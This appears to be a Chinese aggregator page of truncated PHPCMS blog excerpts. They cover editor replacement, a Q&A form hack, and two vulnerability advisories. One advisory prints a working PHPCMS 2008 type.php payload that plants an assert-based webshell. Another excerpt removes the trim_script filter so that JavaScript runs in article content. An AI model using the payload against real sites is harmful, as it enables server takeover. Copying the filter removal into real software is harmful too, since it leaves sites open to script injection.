PHPCMS

PHPCMS整合百度编辑器UEditor——可能是史上最完整教程(之一)

自闭症网瘾萝莉.ら 提交于 2019-12-09 12:44:10
phpcms自带富文本编辑器为ckeditor,功能不必多说,排版尤其不便;决定替换为百度UEditor。 这里phpcms版本为V9.5.9,UEditor版本为[1.4.3.3 PHP版本]——UTF-8版。其余版本大致相同,具体替换步骤如下:( 提示:修改文件前请做好备份 ) 一、下载UEditor: http://ueditor.baidu.com/website/download.html 二、解压到phpcms目录: 将压塑包内文件夹重命名为 ueditor,解压到phpcms目录下面的 ./statics/js/ 目录下: 三、修改ueditor文件夹中 ueditor/php/config.json文件 ,全局替换: (1)替换上传文件的路径 ,将 /ueditor/php/upload/... 替换为 /uploadfile/...; 以上传图片为例,UEditor默认的图片上传路径设置为 phpcms中图片(附件)的路径及命名规则是 /uploadfile/年/月日/文件名,其中文件名的命名规则是 “年+月+日+时+分+秒+随机3位数字”,故这里替换imagePathFormat的配置项为: 其余以下各个上传配置项的上传路径 'XXXXPathFormat' 部分,均替换为: “/uploadfile/{yyyy}/{mm}{dd}/{yyyy}{mm}{dd}

利用phpcms v9的表单向导实现问答咨询功能

孤人 提交于 2019-12-09 12:42:41
phpcms v9内容管理系统本身是没有问答模块的,只有表单向导,但表单向导有很大的局限性,通过表单向导,我们只能查看用户提交的信息,不能对用户提交的信息进行回复。例如一些机构的网站需要一个接收用户的提问,并对提问进行回复的功能,仅仅利用表单向导是满足不了这种需求的,但通过下面的方法对表单向导模块进行一些改动就可以实现咨询问答功能了。 在phpcms v9后台新建一表单向导“在线问答”,表名为“online_ask”,表名自己定,如下图。 对“在线问答”添加字段,如下图的例子,添加什么字段是根据需求定的。 下图是该表单的预览效果。 这样用户就可以通过该表单提交问题了,但在后台,网站编辑只能通过表单向导模块对问题进行查看,不能对其进行回答并将问题和回答展示在网站前台,如下图。 为了实现网站编辑在查看问题的同时还能对问题进行回答,需要对表单模块做如下的改动: 打开文件phpcms/modules/formguide/templates/formguide_info_view.tpl.php ,在第28行下面添加如下内容: <tr> <td>回      答:</td> <td> <textarea id="answer" cols="80" rows="10"> <?php echo $answer; ?> </textarea> </td> </tr> <tr> <td> </td>

让phpcms v9内容编辑器支持JavaScript、iframe等脚本语言

强颜欢笑 提交于 2019-12-07 09:10:49
在 phpcms v9后台默认的内容 编辑器 中,出于安全考虑,默认是禁止JavaScript脚本的,所以我们在添加文章时,虽然加入了js代码,但实际上并没有起作用,而是以文本形式显示。于是就很多时候是需要修改这一限制,做到在文章内容页也能显示JS代码。 让内容页支持JavaScript,具体修改方法: 从文件 caches\caches_model\caches_data\content_input.class.php 中找到函数: function get($data,$isimport = 0) {$this->data = $data = trim_script($data); 修改为: function get($data,$isimport = 0) {$this->data = $data; //不调用过滤函数 这是网上许多地方都有提到的,其实单单这样设置是不够的,因为仅仅是缓存里面的东西,还需要从根本上改变: 从 phpcms/modules/content/fields/content_input.class.php 找到get函数,按照上面的改法才可以彻底解决这个问题。 声明: 本文采用 BY-NC-SA 协议进行授权,转载还请注明: 让phpcms v9内容编辑器支持JavaScript、iframe等脚本语言 来源: oschina 链接: https:/

推荐PHPCMS V9网站系统

喜欢而已 提交于 2019-12-06 16:51:48
PHPCMS V9(后面简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发 形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的应用需求。 5年开发经验的优秀团队,在掌握了丰富的WEB开发经验和CMS产品开发经验的同时,勇于创新追求完美的设计理念,为全球多达10万网站提供助力,并被更 多的政府机构、教育机构、事业单位、商业企业、个人站长所认可。 V9在保留2008版的特点的同时,对新版本作出重大的创新,以期待全新的PHPCMS系统服务更多的用户。 官方下载地址:http://www.phpcms.cn/v9/ PHPCMS V9用户手册: http://www.ctdisk.com/file/2538257 phpcms_v9二次开发手册: http://www.ctdisk.com/file/2443032 phpcms_V9.zip操作帮助文档: http://www.ctdisk.com/file/2443380 PHPCMS v9 特色介绍 全新框架 采 用全球认可的最为先进的开放理念—— OOP(面向对象),进行全新框架设计。框架结构更为清晰,代码更易于维护。模块化做为功能的开发形式,让扩展性得到保证。V9特别设计的二次开发扩展方 式,让你不再修改官方的代码文件

CVE漏洞—PHPCMS2008 /type.php代码注入高危漏洞预警

ぃ、小莉子 提交于 2019-12-04 06:53:32
摘要:11月4日,阿里云安全首次捕获PHPCMS 2008版本的/type.php远程GetShell 0day利用攻击,攻击者可以利用该漏洞远程植入webshell,导致文件篡改、数据泄漏、服务器被远程控制等一系列严重问题。建议受影响用户尽快升级到最新版本修复。 ——————— PHPCMS网站内容管理系统是国内主流CMS系统之一,同时也是一个开源的PHP开发框架。 PHPCMS最早于2008年推出,最新版已出到v9.6.3,但由于稳定、灵活、开源的特性,时至今日,PHPCMS2008版本仍被许多网站所使用。 漏洞细节 当攻击者向安装有PHPCMS 2008的网站发送uri为如下文本的payload /type.php?template=tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss 那么 @unlink(_FILE_);assert($_POST[1]); 这句恶意php指令将被写入网站的/cache_template/rss.tpl.php文件。 漏洞原理 该漏洞源于PHPCMS 2008源码中的/type.php文件。该文件包含如下代码: if(empty($template)) $template = 'type'; ... include template('phpcms', $template);

phpcms网站漏洞修复 远程代码写入缓存漏洞利用

北战南征 提交于 2019-12-03 09:42:39
SINE安全公司在对phpcms2008网站代码进行安全检测与审计的时候发现该phpcms存在远程代码写入缓存文件的一个SQL注入漏洞,该phpcms漏洞危害较大,可以导致网站被黑,以及服务器遭受黑客的攻击,关于这次发现的phpcms漏洞细节以及如何利用提权我们来详细剖析。 phpcms2008是国内深受站长建站使用的一个内容CMS管理系统,phpcms的开源话,免费,动态,静态生成,API接口,模板免费下载,自定义内容设计,可提供程序的二次开发与设计,大大方便了整个互联网站长的建站使用与优化。整个phpcms采用PHP+Mysql数据库作为架构,稳定,并发高,承载量大。 phpcms2008漏洞详情 在对代码的安全检测与审计当中,发现type.php文件代码存在漏洞,代码如下: <?php require dirname(__FILE__).'/include/common.inc.php'; ... if(empty($template)) $template = 'type'; ... include template('phpcms', $template); ... ?> 来源: oschina 链接: https://my.oschina.net/u/3611008/blog/2967377

phpcms网站漏洞如何修复对远程代码写入缓存漏洞利用

霸气de小男生 提交于 2019-12-03 04:19:35
SINE安全公司在对phpcms2008网站代码进行安全检测与审计的时候发现该phpcms存在远程代码写入缓存文件的一个SQL注入漏洞,该phpcms漏洞危害较大,可以导致网站被黑,以及服务器遭受黑客的攻击,关于这次发现的phpcms漏洞细节以及如何利用提权我们来详细剖析。 phpcms2008是国内深受站长建站使用的一个内容CMS管理系统,phpcms的开源话,免费,动态,静态生成,API接口,模板免费下载,自定义内容设计,可提供程序的二次开发与设计,大大方便了整个互联网站长的建站使用与优化。整个phpcms采用PHP+Mysql数据库作为架构,稳定,并发高,承载量大。 phpcms2008漏洞详情 在对代码的安全检测与审计当中,发现type.php文件代码存在漏洞,代码如下: <?php require dirname(__FILE__).'/include/common.inc.php'; ... if(empty($template)) $template = 'type'; ... include template('phpcms', $template); ... ?> 以上代码if(empty($template)) 在进行变量定义的时候可以跟进来看下,通过extract进行变量的声明与注册,如果当前的注册已经有了,就不会覆盖当前已有的声明,导致可以变量伪造与注入。

watchbog再升级,企业黄金修补期不断缩小,或面临蠕虫和恶意攻击

橙三吉。 提交于 2019-11-29 19:11:51
概要 近日,阿里云安全团队发现wacthbo挖矿团伙[1]新增了CVE_2019_5475 的漏洞利用代码,并开始进行尝试性攻击。 通过对CVE_2019_5475漏洞的生命周期进行分析后发现,漏洞批量化利用的速度正在提高,如果未能在黄金修补周期内对漏洞进行修补,将有可能很快遭遇蠕虫和恶意攻击程序的攻击。 阿里云目前已第一时间上线默认防御策略。 背景 阿里云安全团队9月6日捕获了一起新漏洞利用,通过对涉及应用和漏洞的分析,我们确认这是watchbog团伙的一次版本更新,此次版本更新引入了新的漏洞CVE_2019_5475作为攻击武器,利用该漏洞该蠕虫可以通过几个简单的 HTTP 请求即可达到入侵并控制机器的目的。 漏洞涉及的应用Nexus 是一个强大的仓库管理器,它可以用于简化内部仓库和外部仓库的访问,是常见的maven私服解决方案。但是Nexus Repository Manager 2.x Capabilities中存在默认的弱密码账号,在使用401登录认证后,即可通过createrepo或mergerepo配置实现远程命令注入,从而执行任意功能。 漏洞利用payload CVE_2019_5475 的利用代码如下所示: PUT /nexus/service/siesta/capabilities/00009df00fbcea95 HTTP/1.1 Content-Length